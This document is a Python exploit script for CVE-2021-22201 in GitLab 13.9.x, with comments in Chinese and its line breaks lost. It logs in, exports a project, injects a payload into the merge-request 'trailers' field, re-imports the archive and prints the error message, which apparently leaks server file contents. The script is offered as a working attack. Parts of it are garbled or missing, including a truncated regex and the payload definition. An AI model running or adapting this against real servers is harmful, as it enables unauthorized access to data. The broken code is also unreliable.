import os import re import sys import tarfile import requests from json import loads from uuid import uuid1 from time import sleep from shutil import rmtree LOGIN_URI = '/users/sign_in' CREATE_URI = '/projects/new' IMPORT_API = '/api/v4/projects/%s/import' PROJECT_URI = '/%s/' NEW_PROJECT = '/projects/new' BRANCH_URI = '/%s/%s/-/branches/new' PATH = os.path.dirname(__file__) HEADERS = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' } proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} session = requests.session() base_url = None token = None namespace_id = None project_name = None project_id = None branch_name = None token_reg = re.compile(r'name="authenticity_token" value="(?P.*?)"') project_reg = re.compile(r'.*?ID: (\d+)') def banner(): print(""" ---------- CVE-2021-22201 ---------- ---------- 13.9.0 <= Gitlab < 13.9.5 ---------- Author: Search?=Null ---- Usage: python3 CVE-2021-22201.py url username password """) def get_token(uri, regex = False): """ 获取csrf-token """ global token url = base_url + uri req = session.get(url, headers = HEADERS) req_text = req.text try: if not regex: token = token_reg.search(req_text).group('token') else: token = re.search(regex, req_text).group(1) print(f'[+] Get token: {token}') except AttributeError: print('[-] Line 60 Failed to obtain token.') sys.exit(0) except Exception as e: print(f'[-] Line 63 Error: {e}') def login(user, pass_): """ 登录 """ url = base_url + LOGIN_URI get_token(LOGIN_URI) data = { 'utf8': '✓', 'authenticity_token': token, 'user[login]': user, 'user[password]': pass_, 'user[remember_me]': 0 } try: req = session.post(url, headers = HEADERS, data = data, allow_redirects = False) if req.status_code == 302 and 'redirected' in req.text: print('[+] Login Success.') elif req.status_code == 200 and 'Invalid Login or password' in req.text: print('[-] Line 83: Invalid Login or password.') except Exception as e: print('[-] Line 85 Login failed. ' + str(e)) create_project() def create_project(): """ 创建项目, 项目名采用随机字符 """ global PROJECT_URI global project_name global project_id global namespace_id url = base_url + CREATE_URI[:9] get_token(CREATE_URI) project_name = str(uuid1())[:8] r = session.get(base_url + CREATE_URI, headers = HEADERS) namespace_id = re.search(r' ') try: output_path = os.path.join(PATH, 'export') if not os.path.exists(output_path): t = tarfile.open(filepath) os.mkdir(output_path) t.extractall(path = output_path) t.close() file_path = os.path.join(output_path, 'tree', 'project', 'merge_requests.ndjson') with open(file_path, 'r') as f: content = re.sub(r'"trailers":.*?}]', '"trailers":"%s"}]' % payload, f.read()) with open(file_path, 'w+') as fp: fp.write(content) # with tarfile.open(os.path.join(PATH, 'payload.tar.gz'), 'w:gz') as tar: payload_file = tarfile.open(os.path.join(PATH, 'payload.tar.gz'), 'w:gz') payload_file.add(output_path, arcname = '.') payload_file.close() print('[+] Add payload success.') os.remove(filepath) except Exception as e: print(f'[-] Line 298 Error: {e}') import_project() def import_project(): get_token(NEW_PROJECT) url = base_url + '/import/gitlab_project' name = str(uuid1())[:8] data = { 'utf8': '✓', 'authenticity_token': token, 'name': name, 'namespace_id': namespace_id, 'path': name, } f = open(os.path.join(PATH, 'payload.tar.gz'), 'rb') project_file = {'file': f} try: req = session.post(url, headers = HEADERS, data = data, files = project_file) if req.status_code == 302 and 'redirected' in req.text: print('[+] Uploaded project success.') except Exception as e: print(f'[-] Line 319 Error: {e}') f.close() sleep(5) id_ = get_project_id(name) url = base_url + IMPORT_API % (str(id_)) try: r = session.get(url, headers = HEADERS) if r.status_code == 200 and 'JSON::Schema::JsonParseError' in r.text: content = loads(r.text) except Exception as e: print(f'[-] Line 329 Error: {e}') delete_project(name) print('\n\n' + content['failed_relations'][0]['exception_message'] + '\n\n') delete_all() def delete_all(): try: os.unlink(os.path.join(PATH, 'payload.tar.gz')) print('[+] Deleteed file payload.tar.gz success.') rmtree(os.path.join(PATH, 'export'), ignore_errors = True) print('[+] Deleteed dir export succcess.') except Exception as e: print(f'[-] Line 342 Error: {e}') def main(): banner() if len(sys.argv) < 4: sys.exit(0) else: global username url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] if not url.startswith('http://') or not url.startswith('https://'): global base_url base_url = 'http://' + url.rstrip('/') # print(url) login(username, password) if __name__ == '__main__': main()